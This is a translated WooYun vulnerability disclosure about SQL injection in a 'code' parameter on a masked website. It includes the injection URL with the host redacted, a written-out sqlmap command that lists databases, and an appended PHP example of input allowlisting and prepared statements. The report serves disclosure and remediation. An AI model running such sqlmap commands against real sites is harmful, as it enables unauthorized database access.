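Vulnerability details
Disclosure status:
	2015-12-19:	Details reported to the vendor; awaiting vendor handling
	2015-12-23:	Vendor confirmed; details disclosed to the vendor only
	2016-01-02:	Details disclosed to core white hats and experts in related fields
	2016-01-12:	Details disclosed to regular white hats
	2016-01-22:	Details disclosed to trainee white hats
	2016-02-04:	Details disclosed to the public

Brief description:
RT (as in the title)
Detailed description:
Injection point: http://**.**.**.**/ewm.php?code=2871871AX174141/
Affected databases:
D:\Program Files (x86)\admins\python\sqlmap-master>python D:\sqlmap-master\sqlmap.py -u "http://**.**.**.**/ewm.php?code=2871871AX174141" --dbs
Account and password:
 
Proof of vulnerability:
Tables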
Remediation:
Strengthen input filtering to prevent bypass.
Encrypt important information in the database.
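The filtering fix applied to a `code` parameter like the one in the injection point, as an added example that is not code from the affected site or the original report: an allowlist check followed by a bound query parameter. The table `qr_codes`, its columns, the function names and the 1-32 character code format are assumptions.

```php
<?php
declare(strict_types=1);

/**
 * Allowlist check. Assumption: codes look like the sample value on the page
 * (digits and upper-case letters only); the length bound is illustrative.
 */
function is_valid_code(string $code): bool
{
    return preg_match('/\A[0-9A-Z]{1,32}\z/', $code) === 1;
}

/**
 * Look the code up with a bound parameter so the value is never parsed as SQL.
 * `qr_codes` and its columns are hypothetical names.
 */
function find_code(PDO $db, string $code): ?array
{
    if (!is_valid_code($code)) {
        return null; // reject before touching the database
    }
    $stmt = $db->prepare('SELECT code, target_url FROM qr_codes WHERE code = :code');
    $stmt->execute([':code' => $code]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Self-contained demo on an in-memory SQLite database (constructed data).
// With pdo_mysql, also set PDO::ATTR_EMULATE_PREPARES to false so the
// statement is prepared server-side.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE qr_codes (code TEXT PRIMARY KEY, target_url TEXT)');
$db->exec("INSERT INTO qr_codes VALUES ('2871871AX174141', 'https://example.invalid/a')");

$inputs = [
    '2871871AX174141',   // well-formed value
    "2871871AX174141'",  // constructed malformed input: stray quote
    '2871871AX174141/',  // constructed malformed input: trailing slash
];
foreach ($inputs as $in) {
    $row = find_code($db, $in);
    printf("%-20s => %s\n", $in, $row === null ? 'rejected/not found' : 'found');
}
```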
Copyright notice: please credit the source when reposting: darkrerror@乌云 (WooYun)
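Vulnerability response
Vendor response:
Severity: Medium
Vulnerability Rank: 10
Confirmation time: 2015-12-23 09:48
Vendor reply:
CNVD confirmed and reproduced the reported issue and has handed it to CNCERT to notify China Mobile Group, which will coordinate with the website's administrators to handle it.
Latest status:
None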
